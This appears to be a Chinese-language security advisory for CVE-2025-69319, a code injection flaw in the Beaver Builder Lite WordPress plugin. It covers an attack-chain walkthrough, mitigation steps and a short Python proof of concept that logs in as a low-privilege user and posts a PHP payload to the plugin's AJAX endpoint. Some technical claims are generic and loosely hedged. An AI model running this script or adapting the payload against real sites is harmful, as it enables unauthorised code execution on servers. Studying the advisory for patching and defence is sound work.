CVE-2025-69319 | Beaver Builder 插件代码注入漏洞

漏洞信息

漏洞编号

CVE-2025-69319

漏洞类型

代码注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Beaver Builder Lite Version (WordPress Plugin)

漏洞概述

CVE-2025-69319是WordPress平台Beaver Builder插件中的一个高危代码注入漏洞，CVSS评分达到7.5分。该漏洞由PatchStack安全团队发现，存在于beaver-builder-lite-version插件2.9.4.1及以下版本中。漏洞类型为"Improper Control of Generation of Code"（代码生成控制不当），允许低权限攻击者在无需用户交互的情况下，通过网络远程利用此漏洞执行任意代码。由于该插件在WordPress生态中广泛应用，成千上万的网站可能受到此漏洞影响。攻击者一旦成功利用，可获得服务器完全控制权，进而窃取数据库中的敏感信息、上传恶意文件或建立持久化后门。建议使用该插件的网站管理员立即采取修复措施。

技术细节

该代码注入漏洞源于Beaver Builder插件在处理用户输入时缺乏适当的输入验证和输出编码。攻击者可以通过构造特制的请求参数，在插件的代码生成功能中注入恶意PHP代码或JavaScript脚本。由于插件在某些功能模块直接执行或存储了未经充分过滤的用户输入，攻击者能够绕过现有的安全限制。攻击路径为网络远程发起，无需目标站点用户的交互配合。漏洞利用条件要求攻击者具有低权限账户（如订阅者角色），这大大降低了攻击门槛。一旦payload被成功注入，服务器将执行攻击者指定的代码，实现远程代码执行(RCE)或存储型XSS攻击。攻击者常利用此漏洞获取Webshell，进一步渗透内网系统。

攻击链分析

STEP 1

1

攻击者扫描互联网上的WordPress网站，识别安装Beaver Builder插件的目标

STEP 2

2

攻击者注册低权限账户（如订阅者角色）或利用已有账户登录目标站点

STEP 3

3

构造包含恶意代码的payload，通过插件的AJAX端点发送特制请求

STEP 4

4

payload被插件存储在数据库中，在特定条件下被反序列化或执行

STEP 5

5

服务器执行攻击者注入的PHP代码，返回webshell或直接执行系统命令

STEP 6

6

攻击者获得服务器完全控制权，可进行数据窃取、横向移动或部署后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-69319 Beaver Builder Code Injection PoC
# Target: WordPress site with Beaver Builder Lite <= 2.9.4.1

TARGET = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'
USERNAME = sys.argv[2] if len(sys.argv) > 2 else 'subscriber'
PASSWORD = sys.argv[3] if len(sys.argv) > 3 else 'password'

def exploit_code_injection():
    # Login to get valid session
    login_url = f"{TARGET}/wp-login.php"
    session = requests.Session()
    
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    resp = session.post(login_url, data=login_data)
    
    # Inject malicious payload via Beaver Builder endpoint
    inject_url = f"{TARGET}/wp-admin/admin-ajax.php"
    payload = {
        'action': 'fl_builder_save_settings',
        'node': 'invalid-node',
        'settings': {
            'custom_code': '<?php phpinfo(); ?>'  # Malicious PHP code
        }
    }
    
    response = session.post(inject_url, data=payload)
    print(f"Response Status: {response.status_code}")
    print(f"Response: {response.text}")

if __name__ == '__main__':
    print(f"[*] Exploiting CVE-2025-69319 on {TARGET}")
    exploit_code_injection()

影响范围

Beaver Builder Lite Version <= 2.9.4.1

Beaver Builder Plugin (版本未明确)

防御指南

临时缓解措施

在官方补丁发布前，可临时采取以下措施：(1)限制或禁用Beaver Builder插件的非管理员使用权限；(2)通过.htaccess或Nginx配置禁止访问可疑的AJAX端点；(3)启用WordPress的DISALLOW_FILE_EDIT选项防止通过后台编辑文件；(4)对wp-content目录实施写入权限限制；(5)部署Web应用防火墙规则过滤包含eval()、base64_decode()等危险函数的请求。建议尽快升级到插件最新版本以彻底消除该漏洞风险。